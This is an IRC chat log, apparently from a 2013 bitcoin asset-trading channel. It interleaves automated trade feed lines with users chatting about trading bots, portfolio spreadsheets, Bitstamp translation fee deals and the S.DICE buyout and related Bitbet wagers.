one irrelevant. Jul 18 23:58:40 In comparison. Jul 18 23:58:51 [BTCTC] [S.DICE-PT] 5 @ 0.00005 = 0.0003 BTC [-] Jul 18 23:59:26 uuuuhhh.... Jul 18 23:59:29 What was that? Jul 18 23:59:38 [BTCTC] [TAT.ASICMINER] 58 @ 0.0476 = 2.7608 BTC [-] Jul 18 23:59:56 [BTCTC] [ASICMINER-PT] 1 @ 4.82 BTC [-] Jul 19 00:00:43 Namworld, I like the website, very slick! Jul 19 00:00:46 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 00:00:59 Which one? Jul 19 00:01:03 That alarm? Jul 19 00:01:10 Yea! Jul 19 00:01:34 I needed something to leave open when I sleep but want to watch the price. So I made it. Jul 19 00:02:03 I ain't nearly good enough to make a fully functional trading bot which can make decisions. Jul 19 00:02:33 Hahaha, not just if statements depending on the ticker and let apis do the work? Jul 19 00:02:44 I would kill for a trading bot Jul 19 00:03:01 Rule, there is one guy that sells them Jul 19 00:03:06 on Bitcoin Talk Jul 19 00:03:09 No, because I do not necessarily want to sell or buy if price reach a certain point. Jul 19 00:03:19 [BTCTC] [AMC-PT] 44 @ 0.0025 = 0.11 BTC [+] Jul 19 00:03:22 something that takes in momentum...... Do yo have a link? Jul 19 00:03:27 [BTCTC] [BASIC-MINING] 3 @ 0.700001 = 2.1 BTC [-] Jul 19 00:03:29 I want to check the graphs and what's happening, and maybe stay up to monitor Jul 19 00:03:41 Gimme a second rule and I will try and find him Jul 19 00:03:41 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Jul 19 00:03:52 Well Jul 19 00:04:05 http://www.btcbots.com/ Jul 19 00:04:05 That ain't the only tool I make Jul 19 00:04:07 I'm looking for a btct bot Jul 19 00:04:07 BTCBots.com Jul 19 00:04:22 https://bitcointalk.org/index.php?topic=140427.0 Jul 19 00:04:27 [Tools] Google Spreadsheets auto-updating portfolio JSON functions. Jul 19 00:04:30 Check that out. Jul 19 00:04:44 Still missing BitFunder, waiting for API to be released. Jul 19 00:04:58 any day now Jul 19 00:05:04 Namworld, do you have shares in BITVPS? Jul 19 00:05:20 Yes, a fuck ton Jul 19 00:05:21 rulo, what exactly do you want this bot to do? Jul 19 00:05:45 I had over 12% of BitVPS when RG left and handed it over. Jul 19 00:05:46 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 19 00:06:17 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c Jul 19 00:06:18 btct's json messages are so ... wrong >_< Jul 19 00:06:21 Namworld's Portfolio Jul 19 00:06:44 [BTCTC] [AMC-PT] 15 @ 0.0025 = 0.0375 BTC [+] Jul 19 00:06:51 You can make slick portfolios with that google spreadsheet script and the exchanges APIs Jul 19 00:07:16 Also gox API and blockchain.info API to convert to other currencies and show addresses balances. Jul 19 00:07:21 [BTCTC] [AMC-PT] 35 @ 0.0025 = 0.0875 BTC [+] Jul 19 00:07:48 looks very nice Jul 19 00:07:53 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 00:08:54 [BTCTC] [TAT.ASICMINER] 19 @ 0.0483 = 0.9177 BTC [+] Jul 19 00:10:38 i love that air raid alarm Jul 19 00:11:01 [BTCTC] [AMC-PT] 45 @ 0.0025 = 0.1125 BTC [+] Jul 19 00:11:02 Sorry had a work call there... I'm looking for a bot that will factor in momentum of trades and put in a sell off point / buy back Jul 19 00:12:12 I honestly keep this damn channel open nearly 24/7 to monitor btct Jul 19 00:13:53 Rulother, join #bitcoin-assets-trades Jul 19 00:14:02 You'll only have trades in there Jul 19 00:14:07 [HAVELOCK] [AM100] 20 @ 0.0425 = 0.85 BTC [+] Jul 19 00:14:19 afaik this here is the only source for realtime btct data, right? Jul 19 00:14:29 [BTCTC] [AMC-PT] 346 @ 0.0025 = 0.865 BTC [+] Jul 19 00:14:44 Yes, only in IRC as far as I'm aware Jul 19 00:15:01 I know about that one too, but I like to be social when possible :P Jul 19 00:15:18 [HAVELOCK] [AM100] 10 @ 0.0425 = 0.425 BTC [+] Jul 19 00:15:21 [BTCTC] [BTC-BOND] 50 @ 0.009996 = 0.4998 BTC [+] Jul 19 00:15:23 Unless you make your own feed. Jul 19 00:15:38 Also so I dont have to comb through the forums for slightly useful info Jul 19 00:15:53 doesn't the btct api has a cache time of 10 minutes or something? Jul 19 00:16:01 for trade history Jul 19 00:16:15 [HAVELOCK] [AM100] 5 @ 0.0425 = 0.2125 BTC [+] Jul 19 00:16:48 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00396 = 0.0396 BTC [+] Jul 19 00:17:42 Rulother, combing the forum is a must Jul 19 00:17:45 hmm.. that order is included. well, that's good news Jul 19 00:17:45 [BTCTC] [AMC-PT] 504 @ 0.0025 = 1.26 BTC [+] Jul 19 00:18:06 You need to hear about what's up, not only with the asset, but with the issuers themselves. Jul 19 00:18:14 wow lol Jul 19 00:18:14 [21:17:51] BASIC-MINING Add Bid 366 @ 0,702002 (+256,932732 total) Jul 19 00:18:32 You need to react quick to avoid losses/get gains. Jul 19 00:18:34 I do go through them, but at a glance this is pretty good too Jul 19 00:18:45 But you also need a level head and not blindly panic. Evaluate quickly. Jul 19 00:18:54 [BTCTC] [TAT.ASICMINER] 21 @ 0.0483 = 1.0143 BTC [+] Jul 19 00:19:10 Well yes, the feed can warn you of something happening. Jul 19 00:19:12 [HAVELOCK] [AM100] 13 @ 0.0425 = 0.5525 BTC [+] Jul 19 00:19:14 [HAVELOCK] [AM100] 1 @ 0.04297 BTC [+] Jul 19 00:19:15 [HAVELOCK] [AM100] 200 @ 0.04298 = 8.596 BTC [+] Jul 19 00:19:16 [HAVELOCK] [AM100] 15 @ 0.04299 = 0.6449 BTC [+] Jul 19 00:19:18 [HAVELOCK] [AM100] 25 @ 0.043 = 1.075 BTC [+] Jul 19 00:19:19 [HAVELOCK] [AM100] 20 @ 0.043 = 0.86 BTC [+] Jul 19 00:19:20 [HAVELOCK] [AM100] 50 @ 0.043 = 2.15 BTC [+] Jul 19 00:19:21 [HAVELOCK] [AM100] 5 @ 0.043 = 0.215 BTC [+] Jul 19 00:19:23 [HAVELOCK] [AM100] 61 @ 0.04339 = 2.6468 BTC [+] Jul 19 00:19:24 [HAVELOCK] [AM100] 5 @ 0.0435 = 0.2175 BTC [+] Jul 19 00:19:26 [HAVELOCK] [AM100] 2 @ 0.04367299 = 0.0873 BTC [+] Jul 19 00:19:26 nice spead Jul 19 00:19:27 [HAVELOCK] [AM100] 10 @ 0.0437 = 0.437 BTC [+] Jul 19 00:19:29 [HAVELOCK] [AM100] 2 @ 0.04388998 = 0.0878 BTC [+] Jul 19 00:19:30 [HAVELOCK] [AM100] 500 @ 0.04399999 = 22 BTC [+] Jul 19 00:19:32 [HAVELOCK] [AM100] 20 @ 0.044 = 0.88 BTC [+] Jul 19 00:19:33 [HAVELOCK] [AM100] 5 @ 0.044 = 0.22 BTC [+] Jul 19 00:19:35 [HAVELOCK] [AM100] 153 @ 0.044 = 6.732 BTC [+] Jul 19 00:19:35 *spreadsheet Namworld Jul 19 00:19:36 [HAVELOCK] [AM100] 125 @ 0.0443 = 5.5375 BTC [+] Jul 19 00:19:45 ^ noo Jul 19 00:19:51 LOL Jul 19 00:20:19 You wanted those, enclosure? Waiting for a deposit maybe? Jul 19 00:21:01 s.dice payout is coming: http://blockchain.info/tx/0daad923acb2399c89578f6f8a597fb40222404f7a82c1e2b4ec0e8ddf1a4e73 Jul 19 00:21:57 yay Jul 19 00:22:12 nice coins Jul 19 00:22:31 any information about the buyer yet? Jul 19 00:24:15 Not at all Jul 19 00:24:41 15000 BTC is not enough for the payout... Jul 19 00:25:20 it won't come alltogether but in steps Jul 19 00:25:42 AM100 killed asbot Jul 19 00:27:06 https://bitcointalk.org/index.php?topic=99497.msg2758075#msg2758075 Jul 19 00:27:09 ASICMINER: Entering the Future of ASIC Mining by Inventing It Jul 19 00:28:05 If derp, this is a herp I derped Jul 19 00:28:19 https://bitcointalk.org/index.php?topic=256169.new Jul 19 00:28:24 " Implementing an algorithm to buy low and sell high should be well within the grasp of most first year computer science students." Jul 19 00:28:26 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 00:28:27 lulz Jul 19 00:28:27 [BTCTC] [BASIC-MINING] 1 @ 0.7375 BTC [+] Jul 19 00:28:41 It's true Jul 19 00:28:54 Ah time to get off work Jul 19 00:28:57 [BTCTC] [BASIC-MINING] 18 @ 0.71 = 12.78 BTC [-] Jul 19 00:29:01 [BTCTC] [BASIC-MINING] 3 @ 0.702003 = 2.106 BTC [-] Jul 19 00:29:04 [BTCTC] [BASIC-MINING] 366 @ 0.702002 = 256.9327 BTC [-] Jul 19 00:29:09 woah shit Jul 19 00:29:48 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jul 19 00:31:19 i get off at work all the time Jul 19 00:31:19 [HAVELOCK] [AM1] 1 @ 4.84999999 BTC [+] Jul 19 00:31:42 [HAVELOCK] [AM1] 1 @ 4.84999999 BTC [+] Jul 19 00:31:55 Namworld, maybe there's actually less shares on the open market already.. like you bought bitvps Jul 19 00:31:56 [BTCTC] [AMC-PT] 160 @ 0.0025 = 0.4 BTC [+] Jul 19 00:31:59 [BTCTC] [BTC-BOND] 182 @ 0.009996 = 1.8193 BTC [+] Jul 19 00:32:01 [HAVELOCK] [AM1] 2 @ 4.85 = 9.7 BTC [+] Jul 19 00:32:12 [BTCTC] [AMC-PT] 275 @ 0.0025 = 0.6875 BTC [+] Jul 19 00:32:13 ;;calc 13000000*0.0035 Jul 19 00:32:13 45500 Jul 19 00:32:33 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jul 19 00:32:35 [BTCTC] [BFMINES] 1 @ 0.003998 BTC [-] Jul 19 00:32:37 ^ quite insane amount to pay for any investor Jul 19 00:33:06 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [+] Jul 19 00:33:40 [BTCTC] [AMC-PT] 28 @ 0.0025 = 0.07 BTC [+] Jul 19 00:33:51 [BTCTC] [AMC-PT] 19 @ 0.0025 = 0.0475 BTC [+] Jul 19 00:34:21 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.00396 = 0.1188 BTC [+] Jul 19 00:34:23 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003803 = 0.3803 BTC [-] Jul 19 00:34:47 and considering s.dice dividends are officially paid out to 50m shares, that would require Jul 19 00:34:54 ;;calc 50000000*0.0035 Jul 19 00:34:55 175000 Jul 19 00:35:19 btc Jul 19 00:35:29 [BTCTC] [ASICMINER-PT] 1 @ 4.655 BTC [+] Jul 19 00:35:34 [BTCTC] [ASICMINER-PT] 1 @ 4.653 BTC [-] Jul 19 00:35:38 [BTCTC] [ASICMINER-PT] 1 @ 4.652 BTC [-] Jul 19 00:35:41 [BTCTC] [ASICMINER-PT] 3 @ 4.6511 = 13.9533 BTC [-] Jul 19 00:35:43 [BTCTC] [ASICMINER-PT] 25 @ 4.650001 = 116.25 BTC [-] Jul 19 00:35:47 [BTCTC] [ASICMINER-PT] 6 @ 4.6116 = 27.6696 BTC [-] Jul 19 00:35:52 [BTCTC] [ASICMINER-PT] 1 @ 4.6115 BTC [-] Jul 19 00:35:55 [BTCTC] [ASICMINER-PT] 1 @ 4.611002 BTC [-] Jul 19 00:36:00 [BTCTC] [ASICMINER-PT] 18 @ 4.611001 = 82.998 BTC [-] Jul 19 00:36:02 [BTCTC] [ASICMINER-PT] 303 @ 4.611 = 1397.133 BTC [-] Jul 19 00:36:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.048 BTC [+] Jul 19 00:36:26 [BTCTC] [TAT.ASICMINER] 19 @ 0.0482 = 0.9158 BTC [+] Jul 19 00:36:28 bye megawall Jul 19 00:37:09 heh Jul 19 00:37:30 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 00:37:34 [BTCTC] [BFMINES] 1 @ 0.003998 BTC [-] Jul 19 00:38:00 [BTCTC] [AMC-PT] 42 @ 0.0025 = 0.105 BTC [+] Jul 19 00:38:15 [BTCTC] [ASICMINER-PT] 1 @ 4.62 BTC [+] Jul 19 00:39:12 [BTCTC] [BASIC-MINING] 1 @ 0.72 BTC [+] Jul 19 00:39:14 [BTCTC] [BASIC-MINING] 2 @ 0.72 = 1.44 BTC [+] Jul 19 00:39:16 [BTCTC] [BASIC-MINING] 3 @ 0.700001 = 2.1 BTC [-] Jul 19 00:39:48 [BTCTC] [BASIC-MINING] 2 @ 0.72 = 1.44 BTC [+] Jul 19 00:39:51 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 00:39:52 [HAVELOCK] [AM100] 22 @ 0.04668888 = 1.0272 BTC [-] Jul 19 00:39:58 [BTCTC] [AMC-PT] 4590 @ 0.0025 = 11.475 BTC [+] Jul 19 00:40:20 [HAVELOCK] [AM100] 28 @ 0.04668888 = 1.3073 BTC [-] Jul 19 00:40:35 [BTCTC] [AMC-PT] 3990 @ 0.0025 = 9.975 BTC [+] Jul 19 00:40:47 [HAVELOCK] [AM100] 20 @ 0.0468 = 0.936 BTC [+] Jul 19 00:41:11 [BTCTC] [AMC-PT] 382 @ 0.0025 = 0.955 BTC [+] Jul 19 00:42:46 https://www.bitstamp.net/article/help-translating-bitstamp-you-local-language/ Jul 19 00:42:48 Help us translate Bitstamp to your native language and get 0% commission! - Bitstamp Jul 19 00:43:20 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 00:43:39 Those zero fees are worth a lot to me Jul 19 00:43:52 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 19 00:43:59 I would pay 2BTC for every weeks worth of zero fees Jul 19 00:44:11 Where's a good spot to advertise this? Jul 19 00:44:30 define this Jul 19 00:44:42 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003803 = 0.038 BTC [-] Jul 19 00:44:43 My offer to buy your translation skills Jul 19 00:44:44 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003802 = 0.3802 BTC [-] Jul 19 00:44:45 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0038 = 0.38 BTC [-] Jul 19 00:45:03 do you want to ask bitstamp to offer you such a deal or do you want more people getting involved in translation? Jul 19 00:45:04 at a rate of 2BTC for every 100 translations contributed to bitstamp Jul 19 00:45:14 [BTCTC] [BASIC-MINING] 3 @ 0.700002 = 2.1 BTC [-] Jul 19 00:45:19 [BTCTC] [BASIC-MINING] 1 @ 0.700001 BTC [-] Jul 19 00:45:24 I want zero fees Jul 19 00:45:25 [BTCTC] [AMC-PT] 7950 @ 0.0025 = 19.875 BTC [+] Jul 19 00:45:26 [BTCTC] [BASIC-MINING] 1 @ 0.700001 BTC [-] Jul 19 00:45:31 I'm willing to pay a fixed amount for this Jul 19 00:45:33 [BTCTC] [BASIC-MINING] 1 @ 0.700001 BTC [-] Jul 19 00:45:39 [BTCTC] [BASIC-MINING] 1 @ 0.700001 BTC [-] Jul 19 00:45:55 Bitstamp has a program that offers zero fees for translations Jul 19 00:46:06 So I hire a translator to complete bitstamp translations Jul 19 00:46:09 and credit the zero fees to me Jul 19 00:46:10 bitstamp is retarded Jul 19 00:46:23 [BTCTC] [AMC-PT] 35 @ 0.0025 = 0.0875 BTC [+] Jul 19 00:46:55 kokbrekla: maybe so, but it doesn't change the fact that I do a lot of business on there Jul 19 00:47:01 [BTCTC] [BFMINES] 1 @ 0.003998 BTC [-] Jul 19 00:47:23 kakobrekla* Jul 19 00:49:13 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 00:49:17 [BTCTC] [BASIC-MINING] 1 @ 0.700001 BTC [-] Jul 19 00:49:19 [BTCTC] [BASIC-MINING] 2 @ 0.7 = 1.4 BTC [-] Jul 19 00:49:36 i wouldnt do that if i were you Jul 19 00:49:49 [BTCTC] [TAT.ASICMINER] 47 @ 0.0464 = 2.1808 BTC [-] Jul 19 00:49:58 now you reply "yea, and why is that" Jul 19 00:50:04 [BTCTC] [ASICMINER-PT] 3 @ 4.6111 = 13.8333 BTC [-] Jul 19 00:50:05 and i say "cause its bad for your health." Jul 19 00:50:15 an then you say "fuck you" Jul 19 00:50:25 [BTCTC] [BASIC-MINING] 2 @ 0.73 = 1.46 BTC [+] Jul 19 00:51:01 I can do English->French translations Jul 19 00:51:17 lol Jul 19 00:51:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003956 BTC [+] Jul 19 00:51:22 counterparty risk sucks with all these guys Jul 19 00:51:43 [BTCTC] [AMC-PT] 8200 @ 0.0025 = 20.5 BTC [+] Jul 19 00:51:53 qxzn: and who does check the translations? Jul 19 00:52:07 jurov the guy incharge of css Jul 19 00:52:26 http://crowdin.net/project/bitstamp Jul 19 00:52:31 oh, good. i expected reply "google translator" Jul 19 00:52:32 Bitstamp Translations - Crowdin Jul 19 00:52:34 there's some sort of voting system Jul 19 00:52:56 lets all vote all translations as 'dick' Jul 19 00:53:11 jurov will like it Jul 19 00:53:15 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 00:53:19 http://trilema.com/2013/the-list-of-discontinued-assets-on-mpex/ Jul 19 00:53:20 [MPEX] [S.MPOE] 3559 @ 0.00089159 = 3.1732 BTC [-] Jul 19 00:53:23 here we go. Jul 19 00:53:23 The list of discontinued assets on MPEx pe Trilema - Un blog de Mircea Popescu. Jul 19 00:53:41 [BTCTC] [S.DICE-PT] 5 @ 0.00005 = 0.0003 BTC [-] Jul 19 00:53:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.046062 BTC [-] Jul 19 00:53:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.046061 BTC [-] Jul 19 00:53:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.04606 BTC [-] Jul 19 00:53:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.046001 = 0.276 BTC [-] Jul 19 00:54:46 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 00:55:51 [BTCTC] [BASIC-MINING] 1 @ 0.7 BTC [-] Jul 19 00:55:55 [BTCTC] [DMS.MINING] 1 @ 0.015789 BTC [+] Jul 19 00:55:57 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [-] Jul 19 00:57:43 [BTCTC] [AMC-PT] 40000 @ 0.0025 = 100 BTC [+] Jul 19 00:57:46 [BTCTC] [AMC-PT] 1599 @ 0.0025 = 3.9975 BTC [+] Jul 19 00:58:17 [BTCTC] [AMC-PT] 40000 @ 0.0025 = 100 BTC [+] Jul 19 00:58:45 [BTCTC] [AMC-PT] 40000 @ 0.0025 = 100 BTC [+] Jul 19 00:59:06 mircea_popescu: What will be your approach to the bets on bitbet that reference SDICE in some way? Jul 19 00:59:11 [BTCTC] [AMC-PT] 40000 @ 0.0025 = 100 BTC [+] Jul 19 00:59:24 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jul 19 00:59:24 zebedee_ isn't that too vague to answer ? Jul 19 00:59:38 [BTCTC] [AMC-PT] 40000 @ 0.0025 = 100 BTC [+] Jul 19 00:59:45 [BTCTC] [TAT.ASICMINER] 13 @ 0.0464 = 0.6032 BTC [+] Jul 19 00:59:47 there are only 2 bets active Jul 19 00:59:47 I don't think so. How do you intend to resolve the bets, or approach resolving the bets? Jul 19 01:00:37 Take the interesting one with more bets - the BBET vs SDICE market cap bet. Jul 19 01:00:38 [BTCTC] [AMC-PT] 35000 @ 0.0025 = 87.5 BTC [+] Jul 19 01:01:02 [HAVELOCK] [AM100] 50 @ 0.0471 = 2.355 BTC [+] Jul 19 01:01:05 Thanks Jul 19 01:01:23 i guess before mircea says anything, the bets should be closed Jul 19 01:01:39 [HAVELOCK] [AM100] 25 @ 0.0471 = 1.1775 BTC [+] Jul 19 01:01:54 jurov: Makes sense. But nothing about my question was "vague". Jul 19 01:02:05 zebedee_ once its delisted mktcap is zero. Jul 19 01:02:23 [BTCTC] [AMC-PT] 12000 @ 0.0025 = 30 BTC [+] Jul 19 01:02:25 jurov makes little difference as new bets will be refunded anyway, cutoff is yest Jul 19 01:02:26 [BTCTC] [AMC-PT] 994 @ 0.0025 = 2.485 BTC [+] Jul 19 01:03:08 [BTCTC] [TAT.ASICMINER] 8 @ 0.046001 = 0.368 BTC [-] Jul 19 01:04:31 [BTCTC] [AMC-PT] 7000 @ 0.0025 = 17.5 BTC [+] Jul 19 01:04:49 [BTCTC] [TAT.ASICMINER] 60 @ 0.046 = 2.76 BTC [-] Jul 19 01:05:02 !ticker m s.dice Jul 19 01:05:02 [MPEX:S.DICE] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.002 / 0.00212789 / 0.002499 (705479 shares, 1,501.18 BTC), 30D: 0.00167639 / 0.00255351 / 0.0028 (3942003 shares, 10,065.96 BTC) Jul 19 01:05:19 it shouldn't be hard to really close the bets Jul 19 01:05:49 [BTCTC] [COGNITIVE] 2 @ 0.751 = 1.502 BTC [-] Jul 19 01:05:51 [BTCTC] [COGNITIVE] 1 @ 0.75 BTC [-] Jul 19 01:05:53 [BTCTC] [COGNITIVE] 1 @ 0.725 BTC [-] Jul 19 01:05:55 [BTCTC] [COGNITIVE] 1 @ 0.725 BTC [-] Jul 19 01:06:01 [BTCTC] [AMC-PT] 135 @ 0.0025 = 0.3375 BTC [+] Jul 19 01:06:20 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 19 01:06:23 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 19 01:06:26 [BTCTC] [AMC-PT] 80 @ 0.0025 = 0.2 BTC [+] Jul 19 01:07:01 [BTCTC] [AMC-PT] 1450 @ 0.0025 = 3.625 BTC [+] Jul 19 01:07:13 [BTCTC] [AMC-PT] 900 @ 0.0025 = 2.25 BTC [+] Jul 19 01:07:17 [BTCTC] [AMC-PT] 32 @ 0.0025 = 0.08 BTC [+] Jul 19 01:07:26 or the problem is, after closing the bets are no more refunded? then i get it. Jul 19 01:07:43 yeah. Jul 19 01:07:47 [BTCTC] [BASIC-MINING] 4 @ 0.688 = 2.752 BTC [-] Jul 19 01:07:48 [BTCTC] [AMC-PT] 36 @ 0.0025 = 0.09 BTC [+] Jul 19 01:07:51 [BTCTC] [BASIC-MINING] 1 @ 0.687 BTC [-] Jul 19 01:07:56 kakobrekla how about that, seems the bitbet > satoshidice bet comes out as ayes. Jul 19 01:08:03 another 6k incoming @ mpex Jul 19 01:08:17 http://blockchain.info/de/address/1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Jul 19 01:08:20 Bitcoin Adresse 1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Jul 19 01:08:29 shit happens. Jul 19 01:08:33 [BTCTC] [AMC-PT] 18 @ 0.0025 = 0.045 BTC [+] Jul 19 01:08:49 [BTCTC] [DMS.SELLING] 18 @ 0.022601 = 0.4068 BTC [+] Jul 19 01:08:50 [BTCTC] [DMS.SELLING] 370 @ 0.0226 = 8.362 BTC [-] Jul 19 01:09:01 [BTCTC] [DMS.SELLING] 3 @ 0.02259 = 0.0678 BTC [-] Jul 19 01:09:27 [BTCTC] [DMS.SELLING] 5 @ 0.02222 = 0.1111 BTC [-] Jul 19 01:09:51 !ticker m ^oix Jul 19 01:09:52 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / 106.88616238 / 106.88616238 (2 shares, 0.50 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jul 19 01:10:11 jurov it;'s like this : on one hand handling of bitbet bets is a process, defined and procedures and everything. it's not just a random hey, let's play some bitbet admining. Jul 19 01:10:13 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 19 01:10:31 on the other hand, any bets made in that limbo space when a bet closes before they confirm are donations. Jul 19 01:10:38 mircea_popescu: hey is OIX not picking up the earlier options this month? Jul 19 01:10:46 because of both these reasons, and because the bet refund system works just fine, i fail to see the hurry. Jul 19 01:10:52 thestringpuller!*@* added to ignore list. Jul 19 01:12:04 [HAVELOCK] [AM1] 4 @ 4.849 = 19.396 BTC [-] Jul 19 01:12:42 [BTCTC] [AMC-PT] 3000 @ 0.0025 = 7.5 BTC [+] Jul 19 01:13:25 [HAVELOCK] [AM100] 1 @ 0.044051 BTC [-] Jul 19 01:14:13 [BTCTC] [AMC-PT] 3200 @ 0.0025 = 8 BTC [+] Jul 19 01:14:13 [BTCTC] [TAT.ASICMINER] 14 @ 0.0462 = 0.6468 BTC [+] Jul 19 01:14:14 mircea_popescu: okay. only maybe it could be shown that all new bets will be refunded Jul 19 01:14:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.046 = 0.184 BTC [-] Jul 19 01:14:32 [BTCTC] [S.DICE-PT] 1 @ 0.34 BTC [+] Jul 19 01:14:37 My translation ad: https://bitcointalk.org/index.php?topic=258776.0 Jul 19 01:14:39 [BTCTC] [AMC-PT] 575 @ 0.0025 = 1.4375 BTC [+] Jul 19 01:14:50 thestringpuller: if it was short trade, it doesn't go to OIX Jul 19 01:15:01 [BTCTC] [AMC-PT] 632 @ 0.0025 = 1.58 BTC [+] Jul 19 01:15:13 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 19 01:15:23 pankkake: I'm not sure if they're paying anymore for french. Jul 19 01:15:36 no it seems all translated Jul 19 01:15:45 just voting Jul 19 01:15:54 not sure if they pay anything for that part Jul 19 01:16:49 [BTCTC] [COGNITIVE] 4 @ 0.725 = 2.9 BTC [-] Jul 19 01:17:12 [BTCTC] [COGNITIVE] 1 @ 0.72 BTC [-] Jul 19 01:17:12 mircea_popescu it does? Jul 19 01:17:32 well yeah Jul 19 01:17:45 [BTCTC] [COGNITIVE] 5 @ 0.662001 = 3.31 BTC [-] Jul 19 01:18:17 thestringpuller OIX is 7day only, that's why Jul 19 01:18:24 [HAVELOCK] [AM100] 15 @ 0.044063 = 0.6609 BTC [+] Jul 19 01:18:52 i'm somewhat slow today Jul 19 01:19:10 i lost the bet then Jul 19 01:19:40 [BTCTC] [ASICMINER-PT] 1 @ 4.6111 BTC [-] Jul 19 01:19:51 !t btct bvps Jul 19 01:19:52 You had the last Philistine. This one's mine. Jul 19 01:19:55 heh Jul 19 01:20:00 Namworld what's it called ? Jul 19 01:20:12 !t btct bitvps Jul 19 01:20:13 [BTCT:BITVPS] 1D: 0.0018 / 0.00181 / 0.001973 (3948 shares, 7.2 BTC), 7D: 0.001621 / 0.00185 / 0.002198 (15978 shares, 29.6 BTC), 30D: 0.000702 / 0.00153 / 0.0035 (65504 shares, 100.3 BTC) Jul 19 01:20:23 buttvps Jul 19 01:20:30 hey Jul 19 01:20:31 thats not nice Jul 19 01:20:33 !t btct bitvps Jul 19 01:20:34 [BTCT:BITVPS] 1D: 0.0018 / 0.00181 / 0.001973 (3948 shares, 7.2 BTC), 7D: 0.001621 / 0.00185 / 0.002198 (15978 shares, 29.6 BTC), 30D: 0.000702 / 0.00153 / 0.0035 (65504 shares, 100.3 BTC) Jul 19 01:20:46 [BTCTC] [TAT.ASICMINER] 14 @ 0.046 = 0.644 BTC [-] Jul 19 01:20:58 [BTCTC] [DMS.MINING] 1 @ 0.015789 BTC [+] Jul 19 01:21:47 [BTCTC] [AMC-PT] 19 @ 0.0025 = 0.0475 BTC [+] Jul 19 01:21:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0459 BTC [-] Jul 19 01:21:54 [BTCTC] [AMC-PT] 75 @ 0.0025 = 0.1875 BTC [+] Jul 19 01:22:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003948 BTC [-] Jul 19 01:22:25 [BTCTC] [S.DICE-PT] 1 @ 0.000787 BTC [-] Jul 19 01:22:37 [BTCTC] [COGNITIVE] 4 @ 0.663201 = 2.6528 BTC [+] Jul 19 01:22:56 [BTCTC] [AMC-PT] 1450 @ 0.0025 = 3.625 BTC [+] Jul 19 01:22:59 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 19 01:23:14 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 01:23:20 [BTCTC] [S.DICE-PT] 1 @ 0.003333 BTC [+] Jul 19 01:24:05 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 19 01:24:17 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 19 01:24:19 [BTCTC] [DMS.MINING] 11 @ 0.015 = 0.165 BTC [-] Jul 19 01:25:13 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003948 = 0.0118 BTC [-] Jul 19 01:25:33 [BTCTC] [AMC-PT] 65 @ 0.0025 = 0.1625 BTC [+] Jul 19 01:25:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.046 = 0.184 BTC [+] Jul 19 01:26:14 [BTCTC] [AMC-PT] 1230 @ 0.0025 = 3.075 BTC [+] Jul 19 01:26:56 [BTCTC] [BITVPS] 7 @ 0.00182 = 0.0127 BTC [+] Jul 19 01:27:16 [BTCTC] [S.DICE-PT] 1 @ 0.003469 BTC [+] Jul 19 01:27:18 [BTCTC] [S.DICE-PT] 1 @ 0.003469 BTC [+] Jul 19 01:27:19 [BTCTC] [S.DICE-PT] 3175 @ 0.00347 = 11.0173 BTC [+] Jul 19 01:27:21 [BTCTC] [S.DICE-PT] 1 @ 0.00348 BTC [+] Jul 19 01:27:22 [BTCTC] [S.DICE-PT] 2316 @ 0.00348 = 8.0597 BTC [+] Jul 19 01:27:40 